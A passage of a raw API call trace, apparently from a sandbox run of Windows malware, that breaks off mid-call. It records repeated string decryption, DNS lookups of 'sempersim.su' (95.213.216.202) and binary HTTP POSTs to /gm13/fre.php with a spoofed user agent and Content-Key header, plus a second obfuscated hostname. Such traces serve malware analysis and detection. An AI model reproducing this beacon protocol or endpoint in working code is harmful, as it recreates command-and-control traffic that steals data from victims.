GetProcessHeap () returned 0x620000 [0130.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0130.820] GetProcessHeap () returned 0x620000 [0130.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0130.820] GetProcessHeap () returned 0x620000 [0130.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6432d8 [0130.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.821] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0130.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.831] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0130.837] GetProcessHeap () returned 0x620000 [0130.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0130.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.838] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0130.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.842] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0130.842] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.843] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0130.843] GetProcessHeap () returned 0x620000 [0130.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0130.844] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.844] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6432d8, pdwDataLen=0x19fcfc | out: pbData=0x6432d8, pdwDataLen=0x19fcfc) returned 1 [0130.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.845] CryptDestroyKey (hKey=0x62d710) returned 1 [0130.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0130.846] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0130.846] GetProcessHeap () returned 0x620000 [0130.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0130.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0130.847] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0130.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0130.848] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0130.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0130.849] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0130.849] GetProcessHeap () returned 0x620000 [0130.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0130.849] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c500*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0130.850] GetProcessHeap () returned 0x620000 [0130.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b540 [0130.850] socket (af=2, type=1, protocol=6) returned 0x2cc [0130.851] connect (s=0x2cc, name=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0130.918] FreeAddrInfoW (pAddrInfo=0x63c500*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0130.918] GetProcessHeap () returned 0x620000 [0130.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0130.918] GetProcessHeap () returned 0x620000 [0130.918] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0130.920] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0130.921] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0130.921] GetProcessHeap () returned 0x620000 [0130.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0130.921] GetProcessHeap () returned 0x620000 [0130.921] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0130.921] GetProcessHeap () returned 0x620000 [0130.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642f30 [0130.921] GetProcessHeap () returned 0x620000 [0130.921] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0130.922] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0130.923] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0130.923] GetProcessHeap () returned 0x620000 [0130.923] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0130.923] GetProcessHeap () returned 0x620000 [0130.923] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0130.923] send (s=0x2cc, buf=0x63a880*, len=237, flags=0) returned 237 [0130.924] send (s=0x2cc, buf=0x6421e0*, len=159, flags=0) returned 159 [0130.924] GetProcessHeap () returned 0x620000 [0130.924] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0130.924] recv (in: s=0x2cc, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0132.403] GetProcessHeap () returned 0x620000 [0132.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0132.403] GetProcessHeap () returned 0x620000 [0132.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f30 | out: hHeap=0x620000) returned 1 [0132.404] GetProcessHeap () returned 0x620000 [0132.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0132.404] GetProcessHeap () returned 0x620000 [0132.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0132.404] closesocket (s=0x2cc) returned 0 [0132.405] GetProcessHeap () returned 0x620000 [0132.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b540 | out: hHeap=0x620000) returned 1 [0132.405] GetProcessHeap () returned 0x620000 [0132.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0132.405] GetProcessHeap () returned 0x620000 [0132.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6432d8 | out: hHeap=0x620000) returned 1 [0132.406] GetProcessHeap () returned 0x620000 [0132.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0132.406] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12e0) returned 0x2cc [0132.407] Sleep (dwMilliseconds=0xea60) [0132.416] GetProcessHeap () returned 0x620000 [0132.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643128 [0132.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.417] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0132.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0132.431] GetProcessHeap () returned 0x620000 [0132.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0132.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.433] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0132.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.436] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0132.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.437] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0132.437] GetProcessHeap () returned 0x620000 [0132.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0132.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.438] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643128, pdwDataLen=0x19fcfc | out: pbData=0x643128, pdwDataLen=0x19fcfc) returned 1 [0132.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.439] CryptDestroyKey (hKey=0x62d190) returned 1 [0132.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.440] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0132.440] GetProcessHeap () returned 0x620000 [0132.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0132.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0132.441] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0132.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0132.442] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0132.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0132.443] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0132.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0132.444] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0132.444] GetProcessHeap () returned 0x620000 [0132.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0132.444] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0132.444] GetProcessHeap () returned 0x620000 [0132.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0132.445] GetProcessHeap () returned 0x620000 [0132.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0132.445] GetProcessHeap () returned 0x620000 [0132.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0132.445] GetProcessHeap () returned 0x620000 [0132.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643638 [0132.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.446] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0132.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0132.461] GetProcessHeap () returned 0x620000 [0132.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0132.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.462] CryptImportKey (in: hProv=0x63ba90, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0132.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.467] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0132.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.468] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0132.468] GetProcessHeap () returned 0x620000 [0132.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0132.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.469] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643638, pdwDataLen=0x19fcfc | out: pbData=0x643638, pdwDataLen=0x19fcfc) returned 1 [0132.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.470] CryptDestroyKey (hKey=0x62d190) returned 1 [0132.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0132.471] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0132.471] GetProcessHeap () returned 0x620000 [0132.471] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0132.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0132.472] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0132.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0132.473] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0132.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0132.474] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0132.474] GetProcessHeap () returned 0x620000 [0132.474] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0132.474] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c550*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eaf0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0132.475] GetProcessHeap () returned 0x620000 [0132.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b690 [0132.476] socket (af=2, type=1, protocol=6) returned 0x2d0 [0132.476] connect (s=0x2d0, name=0x63eaf0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0132.525] FreeAddrInfoW (pAddrInfo=0x63c550*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eaf0*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0132.525] GetProcessHeap () returned 0x620000 [0132.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0132.525] GetProcessHeap () returned 0x620000 [0132.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0132.525] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0132.527] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0132.527] GetProcessHeap () returned 0x620000 [0132.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0132.527] GetProcessHeap () returned 0x620000 [0132.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0132.527] GetProcessHeap () returned 0x620000 [0132.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643560 [0132.527] GetProcessHeap () returned 0x620000 [0132.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0132.528] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0132.529] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0132.529] GetProcessHeap () returned 0x620000 [0132.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0132.529] GetProcessHeap () returned 0x620000 [0132.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0132.529] send (s=0x2d0, buf=0x63a880*, len=237, flags=0) returned 237 [0132.530] send (s=0x2d0, buf=0x6421e0*, len=159, flags=0) returned 159 [0132.530] GetProcessHeap () returned 0x620000 [0132.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0132.530] recv (in: s=0x2d0, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0134.368] GetProcessHeap () returned 0x620000 [0134.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0134.369] GetProcessHeap () returned 0x620000 [0134.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643560 | out: hHeap=0x620000) returned 1 [0134.369] GetProcessHeap () returned 0x620000 [0134.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0134.370] GetProcessHeap () returned 0x620000 [0134.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0134.370] closesocket (s=0x2d0) returned 0 [0134.371] GetProcessHeap () returned 0x620000 [0134.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b690 | out: hHeap=0x620000) returned 1 [0134.371] GetProcessHeap () returned 0x620000 [0134.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0134.371] GetProcessHeap () returned 0x620000 [0134.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0134.372] GetProcessHeap () returned 0x620000 [0134.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0134.372] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x570) returned 0x2d0 [0134.374] Sleep (dwMilliseconds=0xea60) [0134.388] GetProcessHeap () returned 0x620000 [0134.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e10 [0134.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.389] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0134.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.397] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0134.407] GetProcessHeap () returned 0x620000 [0134.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639038 [0134.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.408] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639038*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d210) returned 1 [0134.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.409] CryptSetKeyParam (hKey=0x62d210, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0134.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.410] CryptSetKeyParam (hKey=0x62d210, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0134.410] GetProcessHeap () returned 0x620000 [0134.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639038 | out: hHeap=0x620000) returned 1 [0134.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.411] CryptDecrypt (in: hKey=0x62d210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e10, pdwDataLen=0x19fcfc | out: pbData=0x642e10, pdwDataLen=0x19fcfc) returned 1 [0134.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.412] CryptDestroyKey (hKey=0x62d210) returned 1 [0134.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.413] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0134.413] GetProcessHeap () returned 0x620000 [0134.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0134.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0134.414] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0134.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0134.415] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0134.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0134.416] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0134.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0134.467] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0134.467] GetProcessHeap () returned 0x620000 [0134.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0134.467] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0134.467] GetProcessHeap () returned 0x620000 [0134.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0134.468] GetProcessHeap () returned 0x620000 [0134.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0134.468] GetProcessHeap () returned 0x620000 [0134.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e10 | out: hHeap=0x620000) returned 1 [0134.468] GetProcessHeap () returned 0x620000 [0134.468] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6432d8 [0134.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.469] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0134.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.476] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0134.485] GetProcessHeap () returned 0x620000 [0134.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0134.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.486] CryptImportKey (in: hProv=0x63ba08, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0134.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.487] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0134.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0134.487] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0134.487] GetProcessHeap () returned 